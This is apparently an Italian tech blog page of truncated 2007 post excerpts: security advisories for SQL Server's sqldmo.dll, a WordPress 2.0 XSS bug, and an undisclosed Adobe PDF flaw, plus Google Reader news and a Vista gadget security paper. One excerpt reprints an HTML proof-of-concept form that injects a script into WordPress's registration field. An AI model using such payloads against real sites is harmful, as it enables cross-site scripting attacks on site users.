freeuser.org

Incuriosito dai commenti di un mio precedente post mi sono messo a fare un pò di ricerca in merito, direte voi ma la mattina non hai niente da fare??? Intanto cominio col dire che "mi sono sbagliato". Perché la vulnerabilità che ho segnalato è si del 2000, perché il componente che ne "soffre" è del 2000 :) Tale DLL è stata ereditata, pari pari, nella nuova versione di Sql Server 2005, espandendo la vulnerabilità anche a questa fascia di prodotti. L'advisor recita così: Microsoft SQL Server 'sqldmo.dll' ActiveX Control is prone to a buffer-overflow vulnerability because it fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer. Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions. [From Microsoft SQL Server sqldmo.dll A...

Ritengo scortese pubblicare questo genere di informazioni soprattutto quando si parla del "padrone di casa" ... ma tutto sommato ... la sicurezza è un processo aperto e condiviso. Bugtraq ID: 25769 Class: Input Validation Error CVE: Remote: Yes Local: No Published: Sep 22 2007 12:00AM Updated: Sep 22 2007 12:00AM Credit: Adrian Pastor is credited with the discovery of these vulnerabilities. Vulnerable: WordPress WordPress 2.0 Ed ecco la PoC [sourcecode language='xml'] <html> <head></head> <body> <form method="post" action="http://target/wordpress/wp-register.php" > <input type="hidden" name="action" value="register" /> <input type="hidden" name="user_login" id="user_login" value='"><script>alert(1)</script>' /> <input type="hidden" name="user_email" id="user_email" value='">...

Il termine 0Day oramai è una buzzword bella e buona. Ma come sempre accade c'è da prestare orecchio quando chi la usa è una persona (in questo caso team) di rilieavo, mi riferico ai ragazzi di GNUCitizen Quello che si può leggere nella loro sezione project suona pressappoco così: I am closing the season with the following HIGH Risk vulnerability: Adobe Acrobat/Reader PDF documents can be used to compromise your Windows box. Completely!!! Invisibly and unwillingly!!! All it takes is to open a PDF document or stumble across a page which embeds one. [From 0day: PDF pwns Windows | GNUCITIZEN ] E la raccomandazione è ... The issue is quite critical given the fact that PDF documents are in the core of today’s modern business. This and the fact that it may take a while for Adobe to fix their closed source product, are the reasons why I am not going to publish any POCs. You have to take my word for it. The POCs will be released when an update is available. ... penso che un gesto co...

Tomorrow around 9AM Pacific time we will performing some back-end code changes that may result in a few spots of weirdness for things relating to categories. This includes categorizing posts and links. The maintenance should only take a few minutes but I have allocated a couple hours just in case. Once the maintenance is complete you should see new functionality in your admin area so keep your eyes peeled. I will update this thread once the maintenance is complete. [From Scheduled Maintenance -- Friday 9/21 « WordPress.com Forums ]

Sono mancato meno di 48 ore dal mio feed reader e non vi dico le novità. Google Reader abbandona i Labs, sotto forma di lettera a "cuore" aperto: But don't be sad. We'll always remember the good times: our first date , when we rolled out the new user-interface together, and the way sometimes we could just sit there and not talk at all because you are just a label. [From Official Google Reader Blog ] L'iPhone sta ufficialmente approdando in Eurolandia, mentre l'Italia sta a guardare (che poveracci di dirigenti si trovano in ita) Bill Gates fà uno forzo immondo nello spiegare il concetto di umanità ... ... è sempre più una rivista scandalistica ... ma mi riservo di non linkare niente... Voi direte ... "e che c'è di nuovo?" Uhm, forse niente ... però ... Google Presentation è proprio bello ;) (chi ha detto webcast a costo zero?)

Post Flash: Google promuove dai suoi labs Google Reader che ora viene considerata "matura per il mercato" che sia in vista una integrazione con la suite Google Apps ?

Come ogni giorno (non è vero ma lasciate che ci creda) leggo le news del mio feed, e come un coniglio dal cilindro ecco che esce fuori da google reader A paper has just been released on the Windows Vista's gadget API. The abstract is as follows: Windows has had the ability to embed HTML into itâ??s user interface for many years. Right back to and including Windows NT 4.0, it has been possible to embed HTML into the task bar, but the OS has always maintained a sandbox, from which the HTML has been unable to escape. All this changes with Windows Vista. This paper seeks to inform system administrators, users and the wider community on both potential attack vectors using gadgets and the mitigations provided by Windows Vista. The full paper can be found at http://www.portcullis-security.com/165.php . Cheers, Tim -- Tim Brown [From SecurityFocus ] Non c'avevo mai pensato in effetti gran bella pensata e bel white paper ... clicco sul post vengo redirezionato sul foru...